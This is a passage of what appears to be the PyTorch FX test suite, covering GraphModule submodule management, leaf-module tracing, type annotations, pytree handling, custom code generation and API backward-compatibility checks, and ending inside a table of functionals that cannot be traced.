return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
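# NB: the assignment below is unreachable (it follows the return), so
# `calling` stays True after the first call.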
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# The recompile() calls below are not strictly required; they are
# included to exercise the chained __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108")
def test_assert(self):
def f(x):
assert x > 1
return x + 1
try:
torch.fx.proxy.TracerBase.trace_asserts = True
traced = symbolic_trace(f)
finally:
torch.fx.proxy.TracerBase.trace_asserts = False
self.assertEqual(f(2), traced(2))
with self.assertRaises(AssertionError):
traced(0)
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
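# PH leaves mark where real tensors are substituted; symbolic_trace with
# concrete_args flattens the pytree input, and tree_flatten_spec should
# appear in the generated code whenever there are flattened placeholder args.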
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(val))), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def test_custom_codegen(self):
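# ListCodeGen customizes code generation: gen_fn_def makes the generated
# forward take a single args_list and unpack it, additional_globals makes
# `List` available to the generated code, and process_inputs lets
# Graph.process_inputs map a call-time list onto the flattened inputs.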
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf(vals), f(*vals))
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(vals))), f(*vals))
ts_f = torch.jit.script(nf)
self.assertEqual(nf(vals), ts_f(vals))
def test_imul_code_print(self):
graph = torch.fx.Graph()
a = graph.placeholder("a")
b = graph.placeholder("b")
graph.call_function(operator.imul, (a, b), {})
graph.output(a)
gm = torch.fx.GraphModule({}, graph)
gm.recompile()
self.assertEqual(gm(2, 3), 6)
self.assertIn("a *= b", gm.code)
def run_getitem_target():
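# Executed in a subprocess by test_getitem_subproc: temporarily add
# Tensor.__getitem__ to the wrapped-methods list so indexing is traced as a
# call_function, then restore the original list.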
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature-flagged;
# enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
if not isinstance(op.op, types.BuiltinFunctionType):
raise unittest.SkipTest("This path doesn't work on Python functions")
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations while tracing is feature-flagged;
# enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually, since
serialization for `inspect.Signature` objects is not stable across
Python versions.
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
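# Convert a typing annotation into a string that is stable across Python
# versions: handle forward references, then a table of trivial types, then
# recurse into parameterized generics (Tuple, Union/Optional, Dict, List,
# Type, Callable).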
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
        raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}. '
                           f'Please add support for this type and confirm with the '
                           f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
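        # Walk the torch.fx module tree (excluding torch.fx.experimental) and collect every public
        # class or function that has not been given a BC-compatibility designation.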
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
        # Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
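    # Maps each torch.nn.functional name to the (exception type, message regex) expected when
    # trying to symbolically trace that functional directly.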
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"bilinear": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"native_channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"gelu": BUILT_IN_FUNC,
"hardshrink": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"linear": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pairwise_distance": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"prelu": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"max_pool1d_with_indices": CONTROL_FLOW,
"max_pool2d_with_indices": CONTROL_FLOW,
"max_pool3d_with_indices": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
